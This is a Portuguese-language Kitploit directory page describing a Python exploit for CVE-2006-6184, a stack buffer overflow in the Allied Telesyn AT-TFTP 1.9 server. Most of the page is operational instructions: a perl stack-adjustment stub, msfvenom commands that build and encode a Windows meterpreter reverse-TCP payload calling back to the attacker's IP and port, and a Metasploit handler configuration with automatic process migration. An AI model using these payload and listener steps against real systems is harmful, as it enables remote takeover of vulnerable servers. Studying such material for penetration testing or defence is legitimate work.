Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2006-6184 — Este é um exploit autônomo baseado em Python para CVE-2006-6184. Este exploit aciona um estouro de buffer baseado em pilha no Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possivelmente versões anteriores, permitindo que atacantes remotos causem uma negação de serviço ou executem código arbitrário. | Kitploit
Ferramentas/GitHubGitHub/shauntdergrigorian/cve-2006-6184
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoFerramenta de Acesso RemotoExploração de Binários
GitHubshauntdergrigorian/cve-2006-6184

cve-2006-6184

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
1171há 5 anosAinda não revisado

Sobre

Este é um exploit autônomo baseado em Python para CVE-2006-6184. Este exploit aciona um estouro de buffer baseado em pilha no Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possivelmente versões anteriores, permitindo que atacantes remotos causem uma negação de serviço ou executem código arbitrário.

Compartilhar

CVE-2006-6184

Este é um exploit autônomo baseado em Python para CVE-2006-6184. Este exploit aciona um estouro de buffer baseado em pilha no Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possivelmente versões anteriores, permitindo que invasores remotos causem uma negação de serviço ou executem código arbitrário.

Instruções (Atualizadas para 2020)

O payload deve ser personalizado para incluir seu próprio endereço IP e porta de escuta, então você precisará gerá-lo manualmente. Para isso, use os seguintes passos:

1.) Execute o seguinte comando para criar um arquivo hex da quantidade que precisa ser subtraída do ponteiro de pilha (3500):

root@kitploit:~
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Em seguida, use o seguinte comando para criar um payload de shell meterpreter encadeado:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) Então, combine os dois arquivos que você acabou de criar.

root@kitploit:~
cat stackadj payload > shellcode

4.) Finalmente, vamos eliminar os caracteres ruins.

root@kitploit:~
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python

Insira a saída como o valor da variável "payload". Pode ser necessário executar este exploit algumas vezes para que funcione.

Listener do Metasploit

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
  3. set ExitOnSession false
  4. set AutoRunScript post/windows/manage/migrate
  5. exploit -j
Baixar ferramenta